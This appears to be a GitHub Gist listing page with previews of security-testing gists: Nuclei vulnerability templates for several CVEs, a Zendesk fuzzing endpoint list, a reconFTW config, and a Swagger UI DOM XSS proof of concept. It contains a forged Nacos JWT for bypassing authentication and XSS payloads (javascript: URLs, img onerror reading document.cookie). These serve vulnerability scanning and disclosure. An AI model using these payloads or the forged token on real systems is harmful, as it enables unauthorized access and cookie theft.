Emad Shanab emadshanab
@ripp3rdoc
ripp3rdoc / CVE-2019-18935.yaml
Last active March 27, 2024 08:59
Telerik UI Insecure Deserialization — Nuclei Template
id: CVE-2019-18935
info:
  name: Deserialization Vulnerability in Telerik UI for ASP.NET AJAX.
  author: Talson
  severity: critical
  description: |
    Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known due to the presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result in remote code execution.
  remediation: |
    As of 2020.1.114, a default setting prevents the exploit. In 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.
  reference:
@hxlxmjxbbxs
hxlxmjxbbxs / CVE-2023-36845.yaml
Created September 20, 2023 04:15
Nuclei Template For Juniper Networks Junos OS PHP External Variable Modification Vulnerability
id: CVE-2023-36845
info:
  name: Juniper Networks Junos OS PHP External Variable Modification Vulnerability
  author: hxlxmj
  severity: medium
  description: |
    A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environment variables.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-36845
@0x240x23elu
0x240x23elu / CVE-2023-26255.yaml
Created August 26, 2023 02:22
CVE-2023-26255
id: CVE-2023-26255
info:
  name: Stagil navigation for jira - Local File Inclusion
  author: 0x240x23elu
  severity: high
  description: Prior to version 2.0.52 of "Stagil navigation for jira – Menù & Themes", the fileName parameter is vulnerable to a "Directory Traversal" that would allow an attacker to read files on the server knowing their path
  reference:
    - https://github.com/1nters3ct/CVEs/blob/main/CVE-2023-26255.md
  cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
@win3zz
win3zz / zendesk_endpoints.txt
Created July 18, 2023 09:01
List of Zendesk API Endpoints for Fuzzing [Penetration Testing]
POST /api/v2/accounts
GET /api/v2/activities?since=cstest
GET /api/v2/audit_logs?filter[source_type]=cstest&filter[source_id]=1&filter[actor_id]=1&filter[ip_address]=cstest&filter[created_at]=cstest&filter[action]=cstest&sort_by=cstest&sort_order=cstest&sort=cstest
GET /api/v2/automations
POST /api/v2/automations
GET /api/v2/bookmarks
POST /api/v2/bookmarks
GET /api/v2/brands
POST /api/v2/brands
GET /api/v2/custom_objects
@Esonhugh
Esonhugh / maltrail-command-injection.nuclei.yaml
Created July 10, 2023 17:28
Maltrail <= v0.54 is vulnerable to unauthenticated OS command injection during the login process.
id: maltrail-os-command-injection
info:
  author: Esonhugh
  name: Unauthenticated OS Command Injection in stamparm/maltrail
  severity: critical
  description: |
    Maltrail <= v0.54 is vulnerable to unauthenticated OS command injection during the login process.
  reference:
    - "https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/"
@Esonhugh
Esonhugh / nacos_bypass_nuclei_template.yaml
Last active December 18, 2023 06:50
nacos default jwt secret encryption vuln nuclei poc: leaks all passwords and creates a user automatically.
id: nacos-bypass-authentication
variables:
  #token: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.vqhkMLKmquQ6R5AD6VWrTOqgClC599nnAQgQLHhPcLc
  # token is signed with a very long expiry time.
  # token exp -1
  token: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6LTF9.ybUomrBRXZhbUMWVgXRz3Q6zndbF-Zdk4RGpCnV-Ofs
info:
  name: Nacos Bypass Auth with default jwt secret
@jhaddix
jhaddix / reconftw.cfg
Last active June 24, 2024 04:55
reconFTW config file: NO google/osint, wordlist creation, nuclei js analysis
#################################################################
# reconFTW config file #
#################################################################
# General values
tools=~/Tools # Path installed tools
SCRIPTPATH="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )" # Get current script's path
profile_shell=".$(basename $(echo $SHELL))rc" # Get current shell profile
reconftw_version=$(git rev-parse --abbrev-ref HEAD)-$(git describe --tags) # Fetch current reconftw version
generate_resolvers=false # Generate custom resolvers with dnsvalidator
{
  "url": "https://gist.githubusercontent.com/zenelite123/72274842b61e6abdc0c6a7e4edb62b6f/raw/f436f20513608e8c947d224d8fcb671e2587980a/xss.yaml",
  "urls": [
    {
      "url": "https://gist.githubusercontent.com/zenelite123/72274842b61e6abdc0c6a7e4edb62b6f/raw/f436f20513608e8c947d224d8fcb671e2587980a/xss.yaml",
      "name": "Foo"
    }
  ]
}
swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: javascript:alert(document.domain)//
info:
  version: "0.0.1"
  title: DOM XSS PoC
  description: '<form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(document.cookie) src>">'
  termsOfService: "javascript:alert(document.cookie)"
{
  "url": "https://gist.githubusercontent.com/zenelite123/61360869361ff88d7ce3aec863be7785/raw/227f1d30bb292b1d981b30277236c52acb98ae88/test.yaml",
  "urls": [
    {
      "url": "https://gist.githubusercontent.com/zenelite123/61360869361ff88d7ce3aec863be7785/raw/227f1d30bb292b1d981b30277236c52acb98ae88/test.yaml",
      "name": "Test"
    }
  ]
}